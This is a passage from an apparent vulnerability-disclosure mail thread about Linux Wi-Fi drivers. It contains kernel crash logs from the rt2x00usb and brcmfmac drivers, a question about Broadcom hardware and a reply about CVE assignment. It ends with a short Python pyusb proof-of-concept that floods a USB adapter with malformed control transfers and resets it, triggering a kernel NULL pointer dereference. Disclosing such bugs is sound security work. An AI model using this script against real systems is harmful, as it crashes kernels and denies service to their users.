netlink_rcv_skb+0x5d/0x110 > [ +0.000005] rtnetlink_rcv+0x15/0x30 > [ +0.000002] netlink_unicast+0x1b3/0x2a0 > [ +0.000003] netlink_sendmsg+0x25e/0x4e0 > [ +0.000004] ____sys_sendmsg+0x3ef/0x420 > [ +0.000003] ? srso_alias_return_thunk+0x5/0x7f > [ +0.000003] ___sys_sendmsg+0x9a/0xf0 > [ +0.000004] ? kvfree+0x31/0x40 > [ +0.000005] __sys_sendmsg+0x89/0xf0 > [ +0.000004] __x64_sys_sendmsg+0x1d/0x30 > [ +0.000002] x64_sys_call+0x114d/0x20b0 > [ +0.000002] do_syscall_64+0x55/0x90 > [ +0.000002] ? __rseq_handle_notify_resume+0x37/0x70 > [ +0.000003] ? srso_alias_return_thunk+0x5/0x7f > [ +0.000002] ? exit_to_user_mode_loop+0xe5/0x130 > [ +0.000002] ? srso_alias_return_thunk+0x5/0x7f > [ +0.000003] ? exit_to_user_mode_prepare+0x30/0xb0 > [ +0.000002] ? srso_alias_return_thunk+0x5/0x7f > [ +0.000002] ? syscall_exit_to_user_mode+0x37/0x60 > [ +0.000002] ? srso_alias_return_thunk+0x5/0x7f > [ +0.000003] ? do_syscall_64+0x61/0x90 > [ +0.000001] ? do_syscall_64+0x61/0x90 > [ +0.000003] entry_SYSCALL_64_after_hwframe+0x73/0xdd > [ +0.000002] RIP: 0033:0x7bfb4872799d > [ +0.000005] Code: 28 89 54 24 1c 48 89 74 24 10 89 7c 24 08 e8 6a 90 f6 > ff 8b 54 24 1c 48 8b 74 24 10 41 89 c0 8b 7c 24 08 b8 2e 00 00 00 0f 05 > <48> 3d 00 f0 ff ff 77 33 44 89 c7 48 89 44 24 08 e8 ae 90 f6 ff 48 > [ +0.000001] RSP: 002b:00007ffd73cd3280 EFLAGS: 00000293 ORIG_RAX: > 000000000000002e > [ +0.000003] RAX: ffffffffffffffda RBX: 00000000000004a3 RCX: > 00007bfb4872799d > [ +0.000001] RDX: 0000000000000000 RSI: 00007ffd73cd32c0 RDI: > 000000000000000c > [ +0.000002] RBP: 000055d422a2e030 R08: 0000000000000000 R09: > 0000000000000000 > [ +0.000001] R10: 0000000000000000 R11: 0000000000000293 R12: > 0000000000000000 > [ +0.000001] R13: 00007ffd73cd3410 R14: 00007ffd73cd340c R15: > 0000000000000000 > [ +0.000004] </TASK> > [ +0.000001] Modules linked in: rt2800usb rt2x00usb rt2800lib rt2x00lib > tcp_diag inet_diag bnep nfnetlink_queue nfnetlink_log bluetooth > ecdh_generic ecc usbmon nf_conntrack_netlink xfrm_user xfrm_algo > xt_addrtype br_netfilter ccm xt_CHECKSUM xt_MASQUERADE xt_conntrack > ipt_REJECT nf_reject_ipv4 xt_tcpudp nft_compat nft_chain_nat nf_nat > nf_conntrack nf_defrag_ipv6 nf_defrag_ipv4 nf_tables libcrc32c nfnetlink > bridge stp llc overlay intel_rapl_msr intel_rapl_common > snd_hda_codec_realtek snd_hda_codec_generic snd_hda_codec_hdmi > snd_hda_intel snd_intel_dspcfg mt7921u mt76x2u snd_intel_sdw_acpi > mt7921_common mt76x2_common edac_mce_amd amdgpu snd_hda_codec > mt76_connac_lib mt76x02_usb mt76x02_lib mt76_usb snd_hda_core kvm_amd > snd_hwdep mt76 binfmt_misc kvm snd_pcm irqbypass mac80211 crct10dif_pclmul > snd_seq_midi amdxcp polyval_clmulni snd_seq_midi_event iommu_v2 > polyval_generic drm_buddy ghash_clmulni_intel sha256_ssse3 snd_rawmidi > gpu_sched sha1_ssse3 drm_suballoc_helper aesni_intel drm_ttm_helper > nls_iso8859_1 ttm crypto_simd > [ +0.000056] snd_seq cryptd cfg80211 drm_display_helper snd_seq_device > snd_timer cec rapl rc_core joydev input_leds libarc4 drm_kms_helper > eeepc_wmi snd wmi_bmof i2c_algo_bit k10temp soundcore ccp mac_hid > sch_fq_codel msr parport_pc ppdev lp parport drm efi_pstore ip_tables > x_tables autofs4 hid_logitech_hidpp hid_logitech_dj hid_generic usbhid hid > mfd_aaeon asus_wmi video ledtrig_audio sparse_keymap platform_profile > crc32_pclmul nvme ahci i2c_piix4 r8169 xhci_pci libahci nvme_core > xhci_pci_renesas realtek nvme_common wmi > [ +0.000037] CR2: 00000000000011b0 > [ +0.000002] ---[ end trace 0000000000000000 ]--- > [ +0.164871] RIP: 0010:rt2x00usb_clear_entry+0x5/0x40 [rt2x00usb] > [ +0.000008] Code: d2 31 c9 31 f6 31 ff 45 31 c0 e9 e6 1a 90 e5 66 0f 1f > 44 00 00 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 0f 1f 44 00 00 > <48> 8b 47 10 48 c7 07 00 00 00 00 83 78 10 0e 74 0b 31 c0 31 f6 31 > [ +0.000003] RSP: 0018:ffffb0fe4126f5e0 EFLAGS: 00010206 > [ +0.000003] RAX: ffffffffc20411f0 RBX: 000000000000005f RCX: > 0000000000000000 > [ +0.000002] RDX: 0000000000000000 RSI: 0000000000000000 RDI: > 00000000000011a0 > [ +0.000003] RBP: ffffb0fe4126f600 R08: 0000000000000000 R09: > 0000000000000000 > [ +0.000002] R10: 0000000000000000 R11: 0000000000000000 R12: > ffff919567fab4f0 > [ +0.000002] R13: ffff9198efd9e060 R14: ffff9198efd9c900 R15: > ffff9196786a4000 > [ +0.000002] FS: 00007bfb476a34c0(0000) GS:ffff91a42ee00000(0000) > knlGS:0000000000000000 > [ +0.000002] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 > [ +0.000002] CR2: 00000000000011b0 CR3: 000000011e4ce000 CR4: 00000 > > > > There is another point that we do not quite understand. We also triggered > this vulnerability on a Broadcom network card. However, the kernel message > indicated that the issue was due to the brcmfmac firmware. Using lsusb, we > discovered that this chip also uses the rt2x00 chipset. Could you please > clarify whether you can address this issue as well, or should we notify > Broadcom? > > ----------------------------- Broadcom crash log" > > [ +0.709539] usb 3-1.4: reset high-speed USB device number 8 using xhci_hcd > [ +0.133374] brcmfmac: brcmf_c_process_clm_blob: no clm_blob available > (err=-2), device may have limited channels available > [ +0.000007] brcmfmac: brcmf_c_process_txcap_blob: no txcap_blob available > (err=-2) > [ +0.000742] brcmfmac: brcmf_c_preinit_dcmds: Firmware: BCM43236/3 wl0: Nov > 30 2011 17:33:42 version 5.90.188.22 > [ +0.056253] usb 3-1.4 wlxbc307eab1237: renamed from wlan0 > [ +0.024459] ieee80211 phy33: brcmf_cfg80211_escan_handler: scan not ready, > bsscfgidx=0 > [ +0.000006] ieee80211 phy33: brcmf_fweh_event_worker: event handler failed > (69) > [ +0.003143] ieee80211 phy33: brcmf_cfg80211_escan_handler: scan not ready, > bsscfgidx=0 > [ +0.000003] ieee80211 phy33: brcmf_fweh_event_worker: event handler failed > (69) > [ +0.000003] ieee80211 phy33: brcmf_cfg80211_escan_handler: scan not ready, > bsscfgidx=0 > [ +0.000001] ieee80211 phy33: brcmf_fweh_event_worker: event handler failed > (69) > [ +0.003414] ieee80211 phy33: brcmf_cfg80211_escan_handler: scan not ready, > bsscfgidx=0 > [ +0.000004] ieee80211 phy33: brcmf_fweh_event_worker: event handler failed > (69) > [ +0.013322] ieee80211 phy33: brcmf_cfg80211_escan_handler: scan not ready, > bsscfgidx=0 > [ +0.000003] ieee80211 phy33: brcmf_fweh_event_worker: event handler failed > (69) > [ +0.000047] ieee80211 phy33: brcmf_cfg80211_escan_handler: scan not ready, > bsscfgidx=0 > [ +0.000002] ieee80211 phy33: brcmf_fweh_event_worker: event handler failed > (69) > [ +0.001726] ieee80211 phy33: brcmf_cfg80211_escan_handler: scan not ready, > bsscfgidx=0 > [ +0.000003] ieee80211 phy33: brcmf_fweh_event_worker: event handler failed > (69) > [ +0.000053] ieee80211 phy33: brcmf_cfg80211_escan_handler: scan not ready, > bsscfgidx=0 > [ +0.000002] ieee80211 phy33: brcmf_fweh_event_worker: event handler failed > (69) > [ +0.005724] ieee80211 phy33: brcmf_cfg80211_escan_handler: scan not ready, > bsscfgidx=0 > [ +0.000004] ieee80211 phy33: brcmf_fweh_event_worker: event handler failed > (69) > [ +0.082551] ieee80211 phy33: brcmf_cfg80211_escan_handler: scan not ready, > bsscfgidx=0 > [ +0.000007] ieee80211 phy33: brcmf_fweh_event_worker: event handler failed > (69) > [ +0.002798] ieee80211 phy33: brcmf_cfg80211_escan_handler: scan not ready, > bsscfgidx=0 > [ +0.000004] ieee80211 phy33: brcmf_fweh_event_worker: event handler failed > (69) > [ +0.009268] ieee80211 phy33: brcmf_cfg80211_escan_handler: scan not ready, > bsscfgidx=0 > [ +0.000005] ieee80211 phy33: brcmf_fweh_event_worker: event handler failed > (69) > [ +0.037693] ieee80211 phy33: brcmf_cfg80211_escan_handler: scan not ready, > bsscfgidx=0 > [ +0.000007] ieee80211 phy33: brcmf_fweh_event_worker: event handler failed > (69) > [ +0.004651] ieee80211 phy33: brcmf_cfg80211_escan_handler: scan not ready, > bsscfgidx=0 > [ +0.000004] ieee80211 phy33: brcmf_fweh_event_worker: event handler failed > (69) > [ +0.740682] usb 3-1.4: reset high-speed USB device number 8 using xhci_hcd > [ +0.135285] brcmfmac: brcmf_c_process_clm_blob: no clm_blob available > (err=-2), device may have limited channels available > [ +0.000007] brcmfmac: brcmf_c_process_txcap_blob: no txcap_blob available > (err=-2) > [ +0.000741] brcmfmac: brcmf_c_preinit_dcmds: Firmware: BCM43236/3 wl0: Nov > 30 2011 17:33:42 version 5.90.188.22 > [ +0.015434] BUG: kernel NULL pointer dereference, address: 0000000000000360 > [ +0.000004] #PF: supervisor read access in kernel mode > [ +0.000002] #PF: error_code(0x0000) - not-present page > [ +0.000003] PGD 0 P4D 0 > [ +0.000006] Oops: 0000 [#1] PREEMPT SMP NOPTI > [ +0.000005] CPU: 0 PID: 19093 Comm: kworker/0:4 Tainted: G OE > 6.5.0-41-generic #41~22.04.2-Ubuntu > [ +0.000005] Hardware name: System manufacturer System Product Name/TUF > GAMING X570-PLUS, BIOS 3603 03/20/2021 > [ +0.000003] Workqueue: events brcmf_fweh_event_worker [brcmfmac] > [ +0.000024] RIP: 0010:brcmf_cfg80211_escan_handler+0x27/0x380 [brcmfmac] > [ +0.000017] Code: 90 90 90 0f 1f 44 00 00 55 48 89 e5 41 57 41 56 41 55 41 > 54 53 48 83 ec 20 4c 8b 17 44 8b 6e 08 4d 8b 72 20 41 83 fd 04 74 67 <49> > 8b 86 60 03 00 00 48 89 fb a8 01 0f 84 b9 02 00 00 41 83 fd 08 > [ +0.000003] RSP: 0018:ffffb44e061fbd20 EFLAGS: 00010202 > [ +0.000003] RAX: 0000000000000000 RBX: ffff94582e9759c0 RCX: > ffffb44e061fbde8 > [ +0.000003] RDX: ffff9456d574f450 RSI: ffffb44e061fbde8 RDI: > ffff94582e9759c0 > [ +0.000002] RBP: ffffb44e061fbd68 R08: ffff9456d574f450 R09: > 0000000000000000 > [ +0.000003] R10: ffff9458bce3c900 R11: 0000000000000000 R12: > 0000000000000045 > [ +0.000002] R13: 0000000000000008 R14: 0000000000000000 R15: > 0000000000000045 > [ +0.000003] FS: 0000000000000000(0000) GS:ffff9465aea00000(0000) > knlGS:0000000000000000 > [ +0.000003] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 > [ +0.000002] CR2: 0000000000000360 CR3: 0000000210812000 CR4: > 0000000000750ef0 > [ +0.000003] PKRU: 55555554 > [ +0.000002] Call Trace: > [ +0.000003] <TASK> > [ +0.000004] ? show_regs+0x6d/0x80 > [ +0.000007] ? __die+0x24/0x80 > [ +0.000005] ? page_fault_oops+0x99/0x1b0 > [ +0.000006] ? do_user_addr_fault+0x31d/0x6b0 > [ +0.000005] ? exc_page_fault+0x83/0x1b0 > [ +0.000006] ? asm_exc_page_fault+0x27/0x30 > [ +0.000008] ? brcmf_cfg80211_escan_handler+0x27/0x380 [brcmfmac] > [ +0.000016] ? srso_alias_return_thunk+0x5/0x7f > [ +0.000005] ? psi_group_change+0x230/0x570 > [ +0.000006] ? __pfx_brcmf_cfg80211_escan_handler+0x10/0x10 [brcmfmac] > [ +0.000016] brcmf_fweh_call_event_handler+0x5c/0x110 [brcmfmac] > [ +0.000018] brcmf_fweh_event_worker+0x89/0x320 [brcmfmac] > [ +0.000016] ? raw_spin_rq_unlock+0x10/0x40 > [ +0.000004] ? srso_alias_return_thunk+0x5/0x7f > [ +0.000004] ? finish_task_switch.isra.0+0x85/0x2a0 > [ +0.000006] process_one_work+0x240/0x450 > [ +0.000006] worker_thread+0x50/0x3f0 > [ +0.000004] ? srso_alias_return_thunk+0x5/0x7f > [ +0.000005] ? __pfx_worker_thread+0x10/0x10 > [ +0.000004] kthread+0xf2/0x120 > [ +0.000005] ? __pfx_kthread+0x10/0x10 > [ +0.000004] ret_from_fork+0x47/0x70 > [ +0.000005] ? __pfx_kthread+0x10/0x10 > [ +0.000005] ret_from_fork_asm+0x1b/0x30 > [ +0.000007] </TASK> > [ +0.000003] Modules linked in: brcmfmac_wcc brcmfmac brcmutil > nf_conntrack_netlink xfrm_user xfrm_algo xt_addrtype br_netfilter > xt_CHECKSUM xt_MASQUERADE xt_conntrack ipt_REJECT nf_reject_ipv4 xt_tcpudp > nft_compat nft_chain_nat nf_nat nf_conntrack nf_defrag_ipv6 nf_defrag_ipv4 > vboxnetadp(OE) vboxnetflt(OE) vboxdrv(OE) nf_tables libcrc32c nfnetlink > bridge stp llc overlay intel_rapl_msr intel_rapl_common > snd_hda_codec_realtek rt2800usb snd_hda_codec_generic snd_hda_codec_hdmi > rt2x00usb edac_mce_amd rt2800lib snd_hda_intel snd_intel_dspcfg rt2x00lib > snd_intel_sdw_acpi kvm_amd snd_hda_codec amdgpu mac80211 snd_hda_core > snd_hwdep kvm binfmt_misc snd_pcm irqbypass amdxcp crct10dif_pclmul > snd_seq_midi iommu_v2 cfg80211 nls_iso8859_1 polyval_clmulni > snd_seq_midi_event drm_buddy polyval_generic ghash_clmulni_intel libarc4 > input_leds joydev gpu_sched sha256_ssse3 snd_rawmidi sha1_ssse3 > drm_suballoc_helper drm_ttm_helper aesni_intel ttm crypto_simd snd_seq > cryptd drm_display_helper snd_seq_device rapl snd_timer cec rc_core snd > [ +0.000101] eeepc_wmi wmi_bmof drm_kms_helper k10temp i2c_algo_bit > soundcore ccp mac_hid sch_fq_codel msr parport_pc ppdev lp parport drm > efi_pstore ip_tables x_tables autofs4 hid_logitech_hidpp hid_logitech_dj > hid_generic usbhid hid mfd_aaeon asus_wmi video ledtrig_audio sparse_keymap > platform_profile crc32_pclmul nvme ahci i2c_piix4 r8169 xhci_pci nvme_core > libahci xhci_pci_renesas realtek nvme_common wmi > [ +0.000053] CR2: 0000000000000360 > [ +0.000003] ---[ end trace 0000000000000000 ]--- > [ +0.289680] RIP: 0010:brcmf_cfg80211_escan_handler+0x27/0x380 [brcmfmac] > [ +0.000044] Code: 90 90 90 0f 1f 44 00 00 55 48 89 e5 41 57 41 56 41 55 41 > 54 53 48 83 ec 20 4c 8b 17 44 8b 6e 08 4d 8b 72 20 41 83 fd 04 74 67 <49> > 8b 86 60 03 00 00 48 89 fb a8 01 0f 84 b9 02 00 00 41 83 fd 08 > [ +0.000005] RSP: 0018:ffffb44e061fbd20 EFLAGS: 00010202 > [ +0.000005] RAX: 0000000000000000 RBX: ffff94582e9759c0 RCX: > ffffb44e061fbde8 > [ +0.000004] RDX: ffff9456d574f450 RSI: ffffb44e061fbde8 RDI: > ffff94582e9759c0 > [ +0.000003] RBP: ffffb44e061fbd68 R08: ffff9456d574f450 R09: > 0000000000000000 > [ +0.000003] R10: ffff9458bce3c900 R11: 0000000000000000 R12: > 0000000000000045 > [ +0.000003] R13: 0000000000000008 R14: 0000000000000000 R15: > 0000000000000045 > [ +0.000003] FS: 0000000000000000(0000) GS:ffff9465aea00000(0000) > knlGS:0000000000000000 > [ +0.000004] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 > [ +0.000004] CR2: 0000000000000360 CR3: 0000000210812000 CR4: > 0000000000750ef0 > [ +0.000003] PKRU: 55555554 > [ +0.000003] note: kworker/0:4[19093] exited with irqs disabled > [ +0.036443] usb 3-1.4 wlxbc307eab1237: renamed from wlan0 > [ +0.726413] ieee80211 phy34: brcmf_fil_cmd_data: bus is down. we have > nothing to do. > [ +0.000010] ieee80211 phy34: brcmf_notify_escan_complete: Scan abort failed > > Here is the final part of the translation, including your request for a CVE > assignment: _If_ Ubuntu is the upstream/supplier of this vulnerability, the Canonical CNA can assign the CVE. Otherwise we will defer to linux-wireless. > import usb.core > import usb.util > import time > import random > > dev = usb.core.find(idVendor=0x148f, idProduct=0x3572) > if dev is None: > raise ValueError("Device not found") > > > def send_ctrl_transfer(bmRequestType, bRequest, wValue, wIndex, data_length): > try: > data = bytes([0xFF] * data_length) > print( > f"Sending: bmRequestType={bmRequestType}, bRequest={bRequest}, wValue={wValue}, wIndex={wIndex}, data={data}") > send = dev.ctrl_transfer(bmRequestType, bRequest, wValue, wIndex, data) > except Exception as e: > print(f"Error: {e}") > > > requests = [ > (0x00, 0x00, 0x0000, 0x0000, 1), > ] > > for i in range(100): > for bmRequestType, bRequest, wValue, wIndex, data_length in requests: > send_ctrl_transfer(bmRequestType, bRequest, wValue, wIndex, data_length) > time.sleep(0.1) > dev.reset() >
Attachment:
signature.asc
Description: PGP signature
